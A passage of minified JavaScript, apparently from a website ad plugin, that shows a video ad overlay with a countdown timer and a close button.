');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}